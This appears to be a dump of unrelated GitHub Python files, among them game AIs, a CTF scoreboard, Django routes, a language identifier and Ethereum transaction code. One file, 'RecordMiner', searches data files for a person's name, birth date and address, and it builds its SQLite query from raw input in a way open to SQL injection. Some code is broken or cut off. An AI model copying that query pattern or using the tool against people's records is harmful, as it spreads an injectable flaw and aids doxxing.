updateGenomeScreen( self ):\n gui.draw.rect( self.screen, self.lg, gui.Rect( 630, 405, 39, 30 ), 1 )\n gui.draw.rect( self.screen, self.lg, gui.Rect( 668, 405, 39, 30 ), 1 )\n gui.draw.rect( self.screen, self.lg, gui.Rect( 706, 405, 39, 30 ), 1 )\n gui.draw.rect( self.screen, self.lg, gui.Rect( 744, 405, 39, 30 ), 1 )\n\n label = self.fontSmall.render( str( self.genomeScreen[ 0 ] ) + '/' + str( len( self.ai.population.generations )-1 ) + ': ' + str( self.genomeScreen[ 1 ] ), 2, self.lg )\n self.screen.blit( label, ( 480, 400 ) )\n\n if self.genomeScreen[ 1 ] == -1:\n for i in range( 10 ):\n label = self.fontSmall.render( '%d:' % i, 2, self.lg )\n self.screen.blit( label, ( 445, 450+15*i ) )\n for i in range( 40 ):\n score = self.ai.population.generations[ self.genomeScreen[ 0 ] ].genomes[ i ].score\n label = self.fontSmall.render( str( score ), 2, self.lg )\n self.screen.blit( label, ( 480+75*int(i/10), 450+15*(i%10) ) )\n else:\n genome = str( self.ai.population.generations[ self.genomeScreen[ 0 ] ].genomes[ self.genomeScreen[ 1 ] ] ).split( '\\n' )\n i = 0\n for line in genome:\n if line != '':\n label = self.fontSmall.render( str( line ), 2, self.lg )\n self.screen.blit( label, ( 480, 450+15*i ) )\n i += 1\n\n def updateGraphScreen( self ):\n self.screen.blit( self.grapher.lastGraph, (480, 400) )\n\n\n def eventCheck( self ):\n for event in gui.event.get( ):\n if event.type == gui.QUIT:\n self.abort = True\n if event.type == gui.KEYDOWN:\n if event.key == gui.K_ESCAPE:\n gui.event.post( gui.event.Event( gui.QUIT ) )\n if event.key == gui.K_LEFT:\n self.cTile.decX( )\n if event.key == gui.K_RIGHT:\n self.cTile.incX( )\n if event.key == gui.K_DOWN:\n self.cTile.incY( )\n if event.key == gui.K_COMMA:\n self.cTile.rotACW( )\n if event.key == gui.K_PERIOD:\n self.cTile.rotCW( )\n if event.key == gui.K_RETURN:\n self.cTile.drop( )\n if event.key == gui.K_p:\n self.time.incSpeed( )\n if event.key == gui.K_o:\n self.time.decSpeed( )\n if event.key == gui.K_a:\n self.aiState = not self.aiState\n if event.type == gui.MOUSEBUTTONUP:\n if event.button == 1:\n if gui.Rect( 480, 630, 101, 30 ).collidepoint( event.pos ):\n self.infoMode = 0\n if gui.Rect( 580, 630, 101, 30 ).collidepoint( event.pos ):\n self.infoMode = 1\n if gui.Rect( 680, 630, 101, 30 ).collidepoint( event.pos ):\n self.infoMode = 2\n if self.infoMode == 1:\n if gui.Rect( 630, 405, 39, 30 ).collidepoint( event.pos ):\n self.genomeScreen[ 0 ] = max( 0, self.genomeScreen[ 0 ]-1 )\n if gui.Rect( 668, 405, 39, 30 ).collidepoint( event.pos ):\n self.genomeScreen[ 0 ] = min( len( self.ai.population.generations )-1, self.genomeScreen[ 0 ]+1 )\n if gui.Rect( 706, 405, 39, 30 ).collidepoint( event.pos ):\n self.genomeScreen[ 1 ] = max( -1, self.genomeScreen[ 1 ]-1 )\n if gui.Rect( 744, 405, 39, 30 ).collidepoint( event.pos ):\n self.genomeScreen[ 1 ] = min( 39, self.genomeScreen[ 1 ]+1 )\n\n def updateEverything( self ):\n self.eventCheck( )\n if not self.update:\n return\n self.updateStatic( )\n self.updateGrid( )\n self.updateGameScreen( )\n if self.infoMode == 0:\n self.updateGeneralScreen( )\n if self.infoMode == 1:\n self.updateGenomeScreen( )\n if self.infoMode == 2:\n self.updateGraphScreen( )\n gui.display.flip( )\n","repo_name":"brnd-from-mars/TetrisAI","sub_path":"viewController.py","file_name":"viewController.py","file_ext":"py","file_size_in_byte":9870,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"10975994929","text":"from random import randint\n\nfrom BaseAI_3 import BaseAI\n\nimport time\nimport numpy as np\n\nsimple=False\nsafeMargin=0.01\ntimeLimit=0.2\n\nclass PlayerAI(BaseAI):\n \n def __init__(self,weights=(1,1,1,1,1,1)):\n self.lastdepth=2\n self.call=0\n self.size=0\n self.D=None\n self.w_nFree=weights[0]\n self.w_max=weights[1]\n self.w_lognFree=weights[2]\n self.w_logmax=weights[3]\n self.w_n2F=weights[4]\n self.w_laplacian2=weights[5]\n self.chain=[]\n \n def getHeuristic(self,grid):\n if self.size!=grid.size:\n self.size=grid.size\n self.D=np.zeros((self.size**2,self.size**2))\n for i in range(self.size):\n for j in range(self.size):\n if (i!=0) and (i!=(self.size-1)):\n if (j!=0) and (j!=(self.size-1)):\n self.D[i*self.size+j][i*self.size+j]=4\n self.D[i*self.size+j][i*self.size+j-1]=-1\n self.D[i*self.size+j][i*self.size+j+1]=-1\n self.D[i*self.size+j][(i-1)*self.size+j]=-1\n self.D[i*self.size+j][(i-1)*self.size+j]=-1\n else:\n self.D[i*self.size+j][i*self.size+j]=2\n self.D[i*self.size+j][(i-1)*self.size+j]=-1\n self.D[i*self.size+j][(i-1)*self.size+j]=-1\n else:\n if (j!=0) and (j!=(self.size-1)):\n self.D[i*self.size+j][i*self.size+j]=2\n self.D[i*self.size+j][i*self.size+j-1]=-1\n self.D[i*self.size+j][i*self.size+j+1]=-1\n nEmpty=0\n maxCell=0\n nF2Cells=0\n nF1Cells=0\n for i in range(grid.size):\n for j in range(grid.size):\n if grid.map[i][j]==0:\n nEmpty+=1\n else:\n if j<(grid.size-1):\n f=(1.0*grid.map[i][j+1])/grid.map[i][j]\n if f in [.5,2]:\n nF2Cells+=1\n if f==1:\n nF1Cells+=1\n if i<(grid.size-1):\n f=(1.0*grid.map[i+1][j])/grid.map[i][j]\n if f in [.5,1,2]:\n nF2Cells+=1\n if f==1:\n nF1Cells+=1\n if grid.map[i][j]>maxCell:\n maxCell=grid.map[i][j]\n m=np.array(grid.map)\n b=m\n b[m==0]=1\n dd=np.matmul(np.log2(b).flatten(),self.D)\n dd[m.flatten()==0]=0\n return self.w_nFree*nEmpty + \\\n self.w_lognFree*np.log2(nEmpty+1) + \\\n self.w_max*maxCell + \\\n self.w_logmax*np.log2(maxCell) + \\\n self.w_n2F*nF2Cells + \\\n (-1)*self.w_laplacian2*np.sum(dd**2)\n \n def alphabeta(self,grid,depth,isMax,alpha,beta,timeLimit):\n if depth==0:\n return self.getHeuristic(grid),grid,-1,\n else:\n if time.clock()>timeLimit:\n return None,None,None,\n bestgrid=None\n bestmove=None\n if isMax:\n v=-1e36\n n=1\n for move in grid.getAvailableMoves():\n n+=1\n if alpha>=beta:\n #print(\"pruning\",depth,alpha,beta,n)\n break\n lgrid=grid.clone()\n lgrid.move(move) \n new_v,new_grid,_=self.alphabeta(lgrid,depth-1,False,alpha,beta,timeLimit)\n if new_v is None:\n return None,None,None,\n if new_v>v:\n v=new_v\n bestmove=move\n bestgrid=new_grid\n alpha=max(alpha,v)\n if bestmove is None:\n return self.getHeuristic(grid),grid,None,\n else:\n v=1e36\n n=1\n for cell in grid.getAvailableCells():\n for cv in [2,4]:\n n+=1\n if alpha>=beta:\n #print(\"pruning\",depth,alpha,beta,n)\n break\n lgrid=grid.clone()\n lgrid.map[cell[0]][cell[1]]=cv\n new_v,new_grid,_=self.alphabeta(lgrid,depth-1,True,alpha,beta,timeLimit)\n if new_v is None:\n return None,None,None,\n if new_vmax_depth:\n break\n new_v,new_grid,new_move=self.alphabeta(grid,depth,True,-1e36,1e36,callTime+timeLimit)\n self.lastdepth=depth-1\n #print(\"Move\",time.clock()-callTime,depth,move,v,max([max(x) for x in bestgrid.map]),max([max(x) for x in grid.map]),self.call)\n #self.chain.append(bestgrid)\n return move\n moves = grid.getAvailableMoves()\n if simple:\n return moves[randint(0, len(moves) - 1)] if moves else None\n else:\n self.best=moves[randint(0, len(moves) - 1)]\n self.expired=False\n depth=1\n while not self.expired:\n testBest=self.alphabeta(depth)\n if testBest:\n self.best=testBest\n depth+=1\n \n bestHeuristic=0\n bestMove=None\n for move in moves:\n testGrid=grid.clone()\n testGrid.move(move)\n availCells=testGrid.getAvailableCells()\n worstHeuristic=1e9\n for cell in availCells:\n for val in [2,4]:\n testGrid2=testGrid.clone()\n testGrid2.map[cell[0]][cell[1]]=val\n moves2=testGrid2.getAvailableMoves()\n for move2 in moves2:\n testGrid3=testGrid2.clone()\n testGrid3.move(move)\n return bestMove\n# nEmpty,maxCell,nF2Cells,sll, \n# log max\n# 1,1,1,1 [128, 64, 256, 256, 128, 128, 256, 128, 128, 128]\n# 20,1,1,0 [1024, 512, 1024, 1024, 2048, 1024, 512, 256, 1024, 512]\n# 20,1,1,0.02 [512, 256, 512, 512, 512, 512, 1024, 512, 512, 512]\n# 20,1,1,0.005 [512, 1024, 1024, 1024, 512, 256, 1024, 256, 1024, 1024]\n# 50,1,1,0.005 [512, 1024, 512, 512, 1024, 512, 512, 1024, 1024, 1024]\n# log max , nEmpty\n# 50,1,1,0.005 [256, 512, 512, 512, 512, 1024, 1024, 1024, 1024, 1024]\n# log nEmpty\n# 5,1,1,0.005 [256, 512, 1024, 512, 128, 512, 1024, 512, 512, 256]\n# 1,0,0,0 \n","repo_name":"torhans/StudyGit","sub_path":"AI/adversSearch/PlayerAI_3.py","file_name":"PlayerAI_3.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38455057683","text":"#!/usr/bin/python\n\nfrom __future__ import print_function, unicode_literals\n\nimport json\nimport sqlite3\n\ndef create_db():\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n c.execute('DROP TABLE IF EXISTS tasks')\n c.execute('CREATE TABLE tasks (name TEXT, flag TEXT, complexity INTEGER)')\n c.execute('DROP TABLE IF EXISTS users')\n c.execute('CREATE TABLE users (name TEXT, state TEXT)')\n conn.commit()\n conn.close()\n\ndef put_tasks(tasks):\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n for name in tasks.keys():\n c.execute('INSERT INTO tasks VALUES(?, ?, ?)',\n (name, tasks[name]['flag'], tasks[name]['complexity']))\n conn.commit()\n conn.close()\n\ndef get_tasks():\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n c.execute('SELECT * from tasks')\n raw_tasks = c.fetchall()\n tasks = {}\n for raw_task in raw_tasks:\n tasks[raw_task[0]] = {'flag': raw_task[1], 'complexity': raw_task[2]}\n conn.close()\n return tasks\n\ndef get_task_flag(name):\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n c.execute('SELECT * from tasks WHERE name = ?', (name,))\n res = c.fetchone()\n conn.close()\n if res == None:\n return None\n return res[1]\n\ndef add_user(name):\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n tasks = get_tasks()\n user_tasks = {}\n for task_name in tasks.keys():\n user_tasks[task_name] = False\n state = json.dumps(user_tasks)\n c.execute('INSERT INTO users VALUES(?, ?)', (name, state))\n conn.commit()\n conn.close()\n return user_tasks\n\ndef get_users():\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n c.execute('SELECT * from users')\n raw_users = c.fetchmany(100)\n users = {}\n for raw_user in raw_users:\n users[raw_user[0]] = json.loads(raw_user[1])\n conn.close()\n return users\n\ndef get_user_state(name):\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n c.execute('SELECT * FROM users WHERE name = ?', (name,))\n raw_user = c.fetchone()\n conn.close()\n if raw_user == None:\n return None\n state = json.loads(raw_user[1])\n return state\n\ndef set_user_state(name, state):\n conn = sqlite3.connect('scoreboard.db')\n c = conn.cursor()\n state = json.dumps(state)\n c.execute('UPDATE users SET state = ? WHERE name = ?', (state, name))\n conn.commit()\n conn.close()\n\ndef try_solve_task(user, task, flag):\n correct_flag = get_task_flag(task)\n if correct_flag == None:\n return 'No such task!'\n if flag != correct_flag:\n return 'Bad flag!'\n state = get_user_state(user)\n if state == None:\n state = add_user(user)\n state[task] = True\n set_user_state(user, state)\n return 'Correct!'\n\nif __name__ == '__main__':\n create_db()\n put_tasks({'a': {'flag': '01', 'complexity': 1}, 'b': {'flag': '02', 'complexity': 2}})\n print(get_tasks())\n print(get_task_flag('a'))\n print(add_user('xairy'))\n print(get_users())\n print(get_user_state('xairy'))\n print(try_solve_task('xairy', 'a', '10'))\n print(try_solve_task('xairy', 'b', '02'))\n print(get_user_state('xairy'))\n","repo_name":"xairy/mipt-ctf","sub_path":"scoreboard/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"52"} +{"seq_id":"15341399469","text":"\nfrom discord.ext import commands\nfrom sqlalchemy import or_\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom ext.db import Session\nfrom ext.db import models\n\n\nclass Module(commands.Cog):\n\n def __init__(self, app, name, path, disableable, emoji):\n self.app = app\n self.name = name\n self.path = path\n self.disableable = disableable\n self.emoji = emoji\n self.session = Session()\n self._init_module_in_db()\n\n def _init_module_in_db(self):\n try:\n db_module = (\n self.session.query(models.Module)\n .filter(\n or_(\n models.Module.name == self.name,\n models.Module.path == self.path\n )\n ).one()\n )\n db_module.name = self.name\n db_module.path = self.path\n db_module.disableable = self.disableable\n db_module.emoji = self.emoji\n self.session.commit()\n except NoResultFound:\n db_module = models.Module(\n name=self.name,\n path=self.path,\n disableable=self.disableable,\n emoji=self.emoji\n )\n self.session.add(db_module)\n self.session.commit()\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"The {self.name} module are online!\")\n","repo_name":"wlsouza/pydiscordbot","sub_path":"pydiscordbot/ext/modules/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9631637747","text":"import os\nimport csv\nimport sqlite3\nimport json\nimport pandas as pd\nimport concurrent.futures\n\n# Developer: SirCryptic (NullSecurityTeam)\n# Info: RecordMiner 1.0\n# dly4evarjw\n# Fuck The System Before It Fucks You!\nos.system('cls' if os.name == 'nt' else 'clear')\nbanner = '''\n________ ______________ _______ \n___ __ \\_____________________________ /__ |/ /__(_)___________________\n__ /_/ / _ \\ ___/ __ \\_ ___/ __ /__ /|_/ /__ /__ __ \\ _ \\_ ___/\n_ _, _// __/ /__ / /_/ / / / /_/ / _ / / / _ / _ / / / __/ / \n/_/ |_| \\___/\\___/ \\____//_/ \\__,_/ /_/ /_/ /_/ /_/ /_/\\___//_/ \n \n'''\n\nprint(banner)\n\ndef search_file(file_path, name, dob, address):\n if not os.path.exists(file_path):\n return []\n\n file_ext = os.path.splitext(file_path)[1]\n results = []\n\n if file_ext == \".csv\":\n try:\n with open(file_path, \"r\") as f:\n reader = csv.reader(f)\n headers = next(reader)\n for row in reader:\n if name in row and (not dob or dob in row) and (not address or address in row):\n results.append(dict(zip(headers, row)))\n except Exception as e:\n print(f\"An error occured while reading the CSV file: {e}\")\n elif file_ext == \".txt\":\n try:\n with open(file_path, \"r\") as f:\n for line in f:\n if name in line and (not dob or dob in line) and (not address or address in line):\n results.append({\"content\": line})\n except Exception as e:\n print(f\"An error occured while reading the text file: {e}\")\n elif file_ext == \".sql\":\n try:\n conn = sqlite3.connect(file_path)\n c = conn.cursor()\n query = f\"SELECT * from records where name like '%{name}%'\"\n if dob:\n query += f\" and dob like '%{dob}%'\"\n if address:\n query += f\" and address like '%{address}%'\"\n c.execute(query)\n rows = c.fetchall()\n headers = [desc[0] for desc in c.description]\n for row in rows:\n results.append(dict(zip(headers, row)))\n conn.close()\n except Exception as e:\n print(f\"An error occured while reading the SQLite file: {e}\")\n elif file_ext == \".json\":\n try:\n with open(file_path, \"r\") as f:\n data = json.load(f)\n for record in data:\n if name in record.values() and (not dob or dob in record.values()) and (not address or address in record.values()):\n results.append(record)\n except Exception as e:\n print(f\"An error occured while reading the JSON file: {e}\")\n elif file_ext == \".xlsx\":\n try:\n df = pd.read_excel(file_path, engine='openpyxl')\n headers = df.columns.tolist()\n for i, row in df.iterrows():\n if name in row.values and (not dob or dob in row.values) and (not address or address in row.values):\n results.append(dict(zip(headers, row.tolist())))\n except Exception as e:\n print(f\"An error occured while reading the xlsx file: {e}\")\n return results\n\ndef main(folder_location):\n name = input(\"Enter the name to search: \")\n dob = input(\"Enter the date of birth (optional): \")\n address = input(\"Enter the address (optional): \")\n\n results = []\n with concurrent.futures.ThreadPoolExecutor() as executor:\n filenames = os.listdir(folder_location)\n future_to_filename = {executor.submit(search_file, os.path.join(folder_location, filename), name, dob, address): filename for filename in filenames}\n for future in concurrent.futures.as_completed(future_to_filename):\n result = future.result()\n results.extend(result)\n\n if results:\n save = input(\"Do you want to save the results to a text file (yes/no)? \")\n if save.lower() == \"yes\":\n with open(f\"{name}.txt\", \"w\") as f:\n for result in results:\n f.write(str(result))\n f.write(\"\\n\")\n\n print(\"Results:\")\n for result in results:\n print(result)\n else:\n print(\"No results found.\")\nif __name__ == \"__main__\":\n folder_location = input(\"Enter the folder location: \")\n while not os.path.isdir(folder_location):\n print(f\"Error: '{folder_location}' is not a valid directory.\")\n folder_location = input(\"Enter the folder location: \")\n\n try:\n main(folder_location)\n except FileNotFoundError:\n print(f\"Error: The directory '{folder_location}' does not exist.\")\n\n main(folder_location)\n","repo_name":"SirCryptic/RecordMiner","sub_path":"recordminer.py","file_name":"recordminer.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70896798244","text":"# -*- coding: UTF-8 -*-\n# 混淆函数\n\nimport random\nfrom XcHelper.common.RandUtils import JRand\nfrom XcHelper.garbages.source.oc.OCGrammar import JOcMethod\nfrom XcHelper.garbages.source.oc.OCHelper import JOcHelper, OC_RET, OC_BASE\nfrom XcHelper.garbages.source.oc.editor.OCMixBlock import JOcMixBlock\n\nclass JOcMixMethod(JOcMethod):\n def __init__(self, mClass):\n JOcMethod.__init__(self, mClass)\n # self.index = None # 索引\n self.variables = {}\n\n # 生成函数声明\n def __make__declare(self):\n var_list = self.variables.keys()\n # 生成指令表\n msgNums = 1 + JRand.rand_nearest(4) # [1, 5]\n for i in range(msgNums):\n while (True):\n n = JOcHelper.var(self.messages)\n if (n not in var_list):\n self.messages.append(n)\n break\n # 生成参数表\n argNums = msgNums if (msgNums != 1) else (0 if (random.random() < 0.5) else 1)\n if (argNums > 0):\n self.argTypes = []\n self.argNames = []\n for i in range(argNums):\n self.argTypes.append(JRand.chose_nearest(OC_BASE))\n while (True):\n n = JOcHelper.var(self.argNames)\n if (n not in var_list):\n self.argNames.append(n)\n break\n\n # 生成函数声明\n def makeDeclare(self, scope):\n self.scope = scope\n self.ret = JRand.chose_nearest(OC_RET)\n self.__make__declare()\n\n # 添加一个局部变量\n def addVarialbe(self, type=None):\n var_list = []\n var_list.extend(self.variables.keys())\n if (self.argNames is not None):\n var_list.extend(self.argNames)\n v = JOcHelper.var(var_list)\n if (type is None):\n type = random.choice(OC_BASE)\n d = JOcHelper.randValue(type)\n self.variables[v] = [type, d]\n return v\n\n # 生成函数逻辑代码块\n def makeBody(self, refClasses = None):\n # 初始化局部变量\n if (self.argNames is None):\n JOcHelper.randVars(self.variables, 0.00, random.randint(0, 5))\n else:\n JOcHelper.randVars(self.variables, 0.85, JRand.rand_nearest(5))\n # 生成逻辑\n tree = JOcMixBlock(self)\n self.lineTree = tree\n if (refClasses is not None):\n others = refClasses[:]\n n = JRand.rand_int(1, len(refClasses))\n for i in range(n):\n cls = JRand.rand_lave_list(others, n, i, 1)\n tree.randStatement(cls)\n else:\n n = random.randint(1, 3)\n for i in range(n):\n tree.randStatement()\n if (self.ret != 'void'):\n tree.makeReturn()","repo_name":"JoliChen/py-tool","sub_path":"easy1/XcHelper/garbages/source/oc/editor/OCMixMethod.py","file_name":"OCMixMethod.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"8740239091","text":"# Problem 53\n# Combinatoric selections\n\ndef create_dic(limit):\n temp_dic = {0:1}\n temp_fact = 1\n for x in range(1,limit+1):\n temp_fact *= x\n temp_dic[x] = temp_fact\n return temp_dic\n\nlimit = 100\nfact_dic = create_dic(limit)\n\ncount = 0\nfor n in range(1,limit+1):\n for r in range(1,n+1):\n if fact_dic[n] / (fact_dic[r] * fact_dic[n-r]) > 1000000:\n count += 1\n\nprint(count)\n","repo_name":"cavandervoort/Project-Euler-001-to-100","sub_path":"Euler_053.py","file_name":"Euler_053.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30564082568","text":"from django.conf.urls import url\n\nfrom user import views\n\napp_name = 'user'\nurlpatterns = [\n url(r'^register$', views.register, name='register'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout$', views.logout, name='logout'),\n url(r'^edit-profile$', views.edit_profile, name='EditProfile'),\n url(r'^edit-password$', views.edit_password, name='EditPassword'),\n url(r'^enter-plan$', views.doctor_free_time, name='EnterPlan'),\n url(r'^plan$', views.doctor_plan, name='EnterPlan'),\n url(r'^static/user/contract/contract.pdf$', views.upload_contract_file),\n url(r'^appointments', views.user_appointments, name='view_appointments'),\n url(r'^weekly-plan', views.doctor_weekly_plan, name='weekly_plan'),\n url(r'api/get-appointments', views.get_appointments),\n url(r'^app_confirmation', views.app_confirmation, name='app_confirmation'),\n url(r'^app_not_confirmation', views.app_not_confirmation, name='app_not_confirmation'),\n url(r'^delete_free_app', views.delete_free_app, name='delete_free_app'),\n url(r'^send_presence_mail', views.send_presence_mail, name='send_presence_mail'),\n url(r'^cancel_app', views.cancel_app, name='cancel_app'),\n url(r'^set_presence', views.set_presence, name='set_presence'),\n url(r'^doctor/(?P[0-9]+)/$', views.get_doctor_detail, name='doctor_detail'),\n url(r'^save_free_time/$', views.save_doctor_free_times, name='save_free_time'),\n url(r'api/doctor-weekly-plan', views.get_doctor_weekly),\n url(r'api/get-all-doctors', views.get_all_doctors)\n]\n","repo_name":"mbehjati/doctoryab","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33756380883","text":"from unittest import TestCase\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\n\r\nclass Tests(TestCase):\r\n def tests(self):\r\n search_request = 'nintendo switch oled'\r\n url = 'https://www.amazon.com'\r\n\r\n browser = webdriver.Chrome(ChromeDriverManager().install())\r\n browser.implicitly_wait(10)\r\n\r\n browser.get(url)\r\n\r\n browser.find_element_by_css_selector('[class=\"nav-input nav-progressive-attribute\"]').send_keys(search_request)\r\n browser.find_element_by_css_selector('[class=\"nav-input nav-progressive-attribute\"]').send_keys(Keys.ENTER)\r\n\r\n actualResult = browser.find_element_by_css_selector('[class=\"a-section a-spacing-small a-spacing-top-small\"]').text\r\n\r\n expectedResult = \"nintendo switch oled\"\r\n\r\n assert expectedResult in actualResult\r\n browser.close()","repo_name":"kucherenko12/kpi_l5","sub_path":"test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14183268478","text":"from rest_framework.authtoken.models import Token\n\nclass SimpleMiddleware:\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n if request.user.is_anonymous and 'Authorization' in request.headers:\n key = request.headers['Authorization'].split()[1]\n request.user = Token.objects.get(key=key).user\n response = self.get_response(request)\n return response","repo_name":"Vashuev/ProjectHunting","sub_path":"mprs/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1580978851","text":"import heapq\n\nclass Solution:\n def lastStoneWeight(self, stones: List[int]) -> int:\n stones = [-item for item in stones]\n heapq.heapify(stones)\n \n while len(stones) > 1:\n big1 = heapq.heappop(stones)\n big2 = heapq.heappop(stones)\n heapq.heappush(stones, big1-big2)\n \n return -stones[0]\n ","repo_name":"chienhsiang-hung/LeetCode-Solutions","sub_path":"problems/last_stone_weight/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"24166945063","text":"import argparse\nimport multiprocessing\nimport pathlib\nimport fasttext\n\nfrom datasets import load_dataset\n\nfrom text_extraction import get_text\n\n#adapted from: https://github.com/bigscience-workshop/data-preparation/blob/main/sourcing/\n# cc_pseudo_crawl/language_annotation/python_scripts/annotate_langid_crawl.py\n\nCOLUMN = \"content\"\n\ndef parseArgs():\n parser = argparse.ArgumentParser(\n description=\"Identify natural languages in code\"\n )\n parser.add_argument(\n \"dataset_name\",\n type=str,\n help=\"HF repo name/path of the dataset.\",\n )\n parser.add_argument(\n \"save_path\",\n default=\"./data_with_language/\",\n type=str,\n help=\"Path to save the new dataset with language column.\",\n )\n parser.add_argument(\n \"model_path\",\n default= \"fasttext_model/lid.176.bin\",\n type=str,\n help=\"Path to fasttext model.\",\n )\n args = parser.parse_args()\n return args\n\ndef load_fasttext_model(path_fasttext_model):\n return fasttext.load_model(path_fasttext_model)\n\n\ndef get_fasttext_info(line, model_lang_id):\n \"\"\"The line should be in lower case and without \\n in it.\"\"\"\n pred = model_lang_id.predict(line)\n lang_pred_fasttext_id = pred[0][0].replace(\"__label__\", \"\")\n score_pred = pred[1][0]\n return lang_pred_fasttext_id, score_pred\n\n\ndef get_all_fasttext_info(document, model_lang_id):\n document = document.lower()\n lang_pred_fasttext_id, score_pred = get_fasttext_info(\n document.replace(\"\\n\", \" \"), model_lang_id\n )\n info = {\n \"lang_pred_fasttext_id\": lang_pred_fasttext_id,\n \"score_pred\": score_pred,\n \"on_lines\": [\n {\n \"id_line\": id_line,\n \"number_caracters_line\": len(line),\n \"lang_pred_fasttext_id_line\": result_fasttext_line[0],\n \"score_pred_line\": result_fasttext_line[1],\n }\n for id_line, line in enumerate(document.split(\"\\n\"))\n for result_fasttext_line in [get_fasttext_info(line, model_lang_id)]\n ],\n }\n return info\n\n\ndef extract_nl_text(example):\n text = get_text(example[COLUMN])\n example[\"nl_text\"] = text\n example[\"nl_size\"] = len(text)\n return example\n\n\nclass FunctionDatasetModifyingDocuments:\n def __init__(self, path_fasttext_model):\n self.path_fasttext_model = path_fasttext_model\n self.model_lang_id = load_fasttext_model(path_fasttext_model)\n\n def __call__(self, example):\n fasttext_pred = get_all_fasttext_info(\n example[\"nl_text\"], self.model_lang_id\n )\n example[\"nl_language\"] = fasttext_pred[\"lang_pred_fasttext_id\"]\n example[\"nl_language_score\"] = fasttext_pred[\"score_pred\"]\n return example\n\n def __reduce__(self):\n return (self.__class__, (self.path_fasttext_model,))\n\n\ndef main():\n args = parseArgs()\n\n dataset = load_dataset(args.dataset_name)\n print(\"Loading dataset done\")\n\n func_dataset_modifying_documents = FunctionDatasetModifyingDocuments(\n args.model_path\n )\n\n dataset = dataset.map(extract_nl_text, num_proc=multiprocessing.cpu_count())\n\n # Could be improved by allowing multiprocessing with map (currently doesn't work)\n dataset = dataset.map(\n func_dataset_modifying_documents, num_proc=1\n ) # num_proc=cpu_count()\n print(\"Fasttext done\")\n\n pathlib.Path(args.save_path).mkdir(parents=True, exist_ok=True)\n dataset.save_to_disk(args.save_path)\n print(\"Shard successfully saved\")","repo_name":"bigcode-project/bigcode-analysis","sub_path":"data_analysis/python_data_analysis/nl_language_identification/language_identifier.py","file_name":"language_identifier.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"52"} +{"seq_id":"20332250705","text":"from decimal import Decimal\nfrom web3.exceptions import BadFunctionCallOutput, ValidationError, StaleBlockchain\nfrom requests.exceptions import ConnectionError\nfrom websockets.exceptions import InvalidStatusCode, ConnectionClosed\nfrom shadowlands.sl_contract import SLContract\nimport schedule\n\nimport pdb\nfrom shadowlands.tui.debug import debug, end_debug\nimport threading\n\nfrom time import sleep\nimport logging\nimport traceback\n\nfrom .connection import Connect\nfrom .transaction import Transact\n\n \nlogging.basicConfig(level = logging.DEBUG, filename = \"shadowlands.log\")\n\nclass NodeConnectionError(Exception):\n pass\n\nclass ENSNotSetError(Exception):\n pass\n \n\nclass Node(Connect, Transact):\n\n NETWORKDICT = {\n 1: 'MainNet',\n 2: 'Morden',\n 3: 'Ropsten',\n 4: 'Rinkeby',\n 42: 'Kovan'\n }\n\n def __init__(self, sl_config=None):\n super().__init__()\n\n self.config = sl_config\n\n self._client_name = None\n\n self._block_listener = None\n self.eth_price = None\n self.update_sem = threading.Semaphore(value=2)\n self.update_lock = threading.Lock()\n\n self.start_heartbeat_thread()\n\n\nfrom eth_utils import decode_hex, encode_hex\nimport time\n\nclass Transact():\n\n def __init__(self):\n self.credstick = None\n\n def push_raw(self, signed_tx):\n w3 = self.w3_getter()\n rx = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n self.config.txq_add(self.network, w3.eth.getTransaction(rx))\n logging.info(\"%s | added tx %s\", time.ctime(), rx.hex())\n schedule.do(self.poll)\n return encode_hex(rx)\n\n\n def _push_next(self):\n txqe = self.config.txq_next()\n rx = self.push_raw(txqe['sx'])\n index = self.config._txqueue.index(txqe)\n txq_update(index, rx)\n\n\n def _sign_and_schedule(tx):\n logging.info(\"Tx submitted to credstick: {}\".format(tx))\n signed_tx = self.credstick.signTx(tx)\n self.config.add_tx\n scheduler.do(self._push_next)\n\n \n def push(self, 